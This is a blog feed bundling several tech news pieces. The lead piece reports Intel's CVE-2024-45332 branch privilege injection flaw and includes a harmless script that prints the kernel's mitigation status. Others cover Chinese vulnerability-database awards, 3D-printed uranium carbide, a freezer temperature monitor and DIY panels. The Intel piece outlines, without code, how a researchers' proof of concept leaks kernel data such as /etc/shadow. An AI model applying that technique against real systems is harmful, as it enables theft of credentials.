The associated vulnerability has been dubbed “branch privilege injection” by the researchers and assigned CVE-2024-45332. The issue causes a race condition in the branch prediction subsystem used in Intel processors.
Branch predictors, such as the Branch Target Buffer (BTB) and the Indirect Branch Predictor (IBP), are hardware components that try to predict the outcome of a branch instruction before it completes in order to improve performance. These predictions are speculative, meaning they are rolled back if they turn out to be wrong; when they are correct, they boost performance.
The researchers discovered that branch predictor updates in Intel processors are not synchronized with instruction execution, which allows them to slip across privilege boundaries. So when a privilege switch occurs (for example, from user mode to kernel mode), there is a small window of time during which an update can be associated with the wrong privilege level.
As a result, the isolation between user and kernel breaks down, and an unprivileged user can leak data from privileged processes. The researchers built a PoC exploit that trains the processor to predict a specific branch target, then performs a system call to move execution into the operating system kernel, resulting in speculative execution through an attacker-controlled target (a gadget). The code then accesses secret data in the cache using side-channel methods and passes the information to the attacker.
The researchers demonstrated their attack on Ubuntu 24.04 with default protection mechanisms enabled, reading the contents of the /etc/shadow file, which holds hashed account passwords. The exploit reaches a peak data-extraction rate of 5.6 KB/s with 99.8% accuracy. Although the attack was demonstrated on Linux, the problem also exists at the hardware level, so in theory it could be used against Windows systems as well.
CVE-2024-45332 is reported to affect all Intel processors from the ninth generation onward (Coffee Lake, Comet Lake, Rocket Lake, Alder Lake, and Raptor Lake). Arm Cortex-X1, Cortex-A76, and AMD Zen 5 and Zen 4 chips were also examined, but they were not found to be affected by CVE-2024-45332.
The researchers reported their findings to Intel engineers in September 2024, and the company has released microcode updates that fix CVE-2024-45332. The firmware patches are said to reduce performance by 2.7%, while software mitigations reduce performance by 1.6–8.3% depending on the processor.
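Since the fix arrives as microcode plus kernel-level mitigations, Linux users can get a quick read on what their kernel currently reports by looking at the sysfs vulnerability files. A minimal, purely informational sketch follows; it only prints what the kernel exposes and does not probe the hardware itself:

```python
#!/usr/bin/env python3
"""Print the mitigation status the Linux kernel reports for known CPU
vulnerabilities (Spectre variants, Meltdown, and so on). Informational
only: it reads sysfs and performs no probing of its own."""

from pathlib import Path

VULN_DIR = Path("/sys/devices/system/cpu/vulnerabilities")

def main() -> None:
    if not VULN_DIR.is_dir():
        print("This kernel does not expose sysfs vulnerability reporting.")
        return
    for entry in sorted(VULN_DIR.iterdir()):
        # Each file holds a one-line status such as
        # "Mitigation: Enhanced / Automatic IBRS" or "Vulnerable".
        print(f"{entry.name:30s} {entry.read_text().strip()}")

if __name__ == "__main__":
    main()
```

Whether and how this particular CVE shows up there depends on the distribution’s kernel and microcode packages, so the authoritative references remain Intel’s advisory and your vendor’s update channel.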
The ETH Zurich team says it will present the exploit in full detail in a talk at the USENIX Security 2025 conference.
The article A New Side-Channel Discovered in Intel Processors Allows Extraction of Secrets from the Kernel comes from il blog della sicurezza informatica.
In China, the CNVD Rewards Top Security Researchers and Collaboration Between Institutions and Companies
During a national cyber security conference, the organizations, companies, and professionals who made a significant contribution to the National Information Security Vulnerability Database (CNNVD) in 2024 were officially honored. The event highlighted the importance of collaboration between public institutions, private companies, and academia in improving the country’s ability to identify, report, and mitigate vulnerabilities in critical infrastructure.
Eleven separate awards were presented during the event, including the “Best Newcomer Award”, the award for “Outstanding Contribution to High-Quality Reporting”, one for “High-Quality Vulnerabilities”, an award for “Vulnerability Control”, and further recognitions for universities, technical experts, and vendors committed to information sharing. The winners include big names in Chinese tech and cyber security such as Huawei, Tencent, Qi’anxin, Sangfor, and many other emerging players.
Considerable attention was also given to academic collaboration, with awards going to institutions such as the Beijing University of Aeronautics and Astronautics and the Qingyuan technical institute. The university contribution was singled out as a key element in training new talent and developing innovative solutions in the field of cyber security.
Numerous companies, including major telecom operators, energy providers, and strategically important industrial players, were recognized for their cooperation in strengthening the security of critical infrastructure. This shows how cyber security has become central to national resilience, cutting across sectors that are fundamental to the country’s stability.
Individual recognitions were not missing either: selected technical experts were honored as “Specially Appointed Technical Experts of the Year” for their specific contributions, including figures from leading companies such as CyberKunlun, Huashun Xinan, and Douxiang. Their work stood as an example of excellence in responding to cyber threats.
At the close of the event, representatives of academic institutions and companies gave speeches reaffirming the need to keep building a cohesive, proactive ecosystem for vulnerability management.
The CNNVD reiterated its commitment to strengthening the database’s role as a national reference point and as a bridge between talent, institutions, and companies, to ensure ever more advanced and coordinated cyber security.
The article In China, the CNVD Rewards Top Security Researchers and Collaboration Between Institutions and Companies comes from il blog della sicurezza informatica.
3D Printing Uranium-Carbide Structures for Nuclear Applications
Fabrication of uranium-based components via DLP. (Zanini et al., Advanced Functional Materials, 2024)
In the nuclear sciences, including fuel production and nuclear medicine (radiopharmaceuticals), specific isotopes often have to be produced as efficiently as possible, or a fuel has to allow gaseous fission products to escape and cooling to improve without the fuel itself being compromised. Giving the target material an optimized 3D shape that increases surface area and safely vents gases during fission can therefore be hugely beneficial, but producing such shapes efficiently is complicated. Photopolymer-based stereolithography (SLA), as recently demonstrated by [Alice Zanini] et al. in a research article in Advanced Functional Materials, offers an interesting new way to accomplish these goals.
The process is essentially what a hobbyist resin-based SLA printer does: the photopolymer uses uranyl ions as the photoactive component along with carbon precursors, and exposure to UV light followed by sintering produces solid uranium dicarbide (UC2) structures. Uranium carbide is one of the alternatives being considered to today’s uranium ceramic fuels in fission reactors, and this method may provide a practical way to manufacture it.
Uranium carbide is also used as a target material in ISOL (isotope separation on-line) facilities like CERN’s ISOLDE, where precise control over the structure of the target could optimize isotope production. Ideally, photocatalysts equivalent to uranyl will be found so that optimized targets of other materials can be printed as well, but even as it stands this is a convincing demonstration of how SLA (DLP or otherwise) stands to transform the nuclear sciences and industries.
Overengineered Freezer Monitor Fills Market Void
A lot of projects we see around here are built not just because they can be built, but because there’s no other option available. Necessity is the mother of invention, as they say. And for [Jeff] who has many thousands of dollars of food stowed in a chest freezer, his need for something to keep track of his freezer’s status was greater than any commercial offering available. Not only are freezers hard on batteries, they’re hard on WiFi signals as well, so [Jeff] built his own temperature monitor to solve both of these issues.
The obvious solution here is a temperature probe that can be fished through the freezer wall in some way, allowing the microcontroller, battery, and wireless module to operate outside of the harsh environment. [Jeff] is using K-type thermocouples, wired through the back of the freezer. The sensing end is also embedded in a block of material, which gives him more diffuse temperature readings than a standard probe would provide. He’s solving some other problems with commercially available probes here too, as many of them require an Internet connection or store data in a cloud. To keep everything local, he ties it all into a Home Assistant setup, which also lets him easily calibrate the temperature readings and notifies him if anything happens to the freezer.
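The write-up does not hinge on any particular firmware, but the local-only pattern is easy to sketch: read the thermocouple through an amplifier such as a MAX31855 and publish readings over MQTT on the LAN for Home Assistant to pick up. The following is a hypothetical sketch for a Raspberry Pi-class board; the amplifier, pins, broker address, and topic are illustrative assumptions, not [Jeff]’s actual design:

```python
# Hypothetical local-only freezer monitor: read a K-type thermocouple via a
# MAX31855 amplifier (Adafruit Blinka/CircuitPython libraries) and publish
# the temperature to a LAN MQTT broker that Home Assistant subscribes to.
import time

import board
import busio
import digitalio
import adafruit_max31855
import paho.mqtt.publish as publish

BROKER = "homeassistant.local"          # assumption: local Mosquitto broker
TOPIC = "freezer/chest/temperature_c"   # assumption: MQTT sensor topic

spi = busio.SPI(board.SCK, MOSI=board.MOSI, MISO=board.MISO)
cs = digitalio.DigitalInOut(board.D5)   # chip-select pin is an assumption
sensor = adafruit_max31855.MAX31855(spi, cs)

while True:
    # The MAX31855 resolves 0.25 °C steps; average a few samples to tame noise.
    samples = [sensor.temperature for _ in range(5)]
    avg = sum(samples) / len(samples)
    publish.single(TOPIC, payload=f"{avg:.2f}", hostname=BROKER, retain=True)
    time.sleep(60)
```

On the Home Assistant side, an MQTT sensor pointed at that topic is all it takes, and an automation watching the value can push a notification the moment the freezer starts warming up, all without anything leaving the LAN.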
Although the build is very robust (or, as [Jeff] himself argues, overengineered) he does note that since he built it there have been some additional products offered for sale that fit this niche application. But even so, we always appreciate the customized DIY solution that avoids things like proprietary software, subscriptions, or cloud services. We also appreciate freezers themselves; one of our favorites was this restoration of a freezer with a $700,000 price tag.
Easy Panels With InkJet, Adhesives, and Elbow Grease
Nothing caps off a great project like a good, professional-looking front panel. Looking good isn’t easy, but luckily [Accidental Science] has a tutorial for a quick-and-easy front panel technique in the video below.
It starts with regular paper and an inkjet or laser printer to print your design. The paper then gets coated on both sides: matte varnish on the front, white spray paint on the back. Then it’s just a matter of cutting the decal from the paper and gluing it to your panel. ([Accidental Science] suggests two-part epoxy, but cautions you to make sure it doesn’t react with the paint.)
He uses aluminum in this example, but there’s no reason you could not choose a different substrate. Once the paper is adhered to the panel, another coat of varnish is applied to protect it. Alternatively, clear epoxy can be used as glue and varnish. The finish produced is very professional, and holds up to drilling and filing the holes in the panel.
We’d probably want to protect the edges by mounting this panel in a frame, but otherwise we’d be proud to put such a panel on a project that required it. We covered a similar technique before, but it required a laminator. If you’re looking for alternatives, the Hackaday community had a lot of ideas on how to make a panel, and if you have a method you’ve documented, feel free to drop it in the tip line.
youtube.com/embed/ekGpPaAR3Ec?…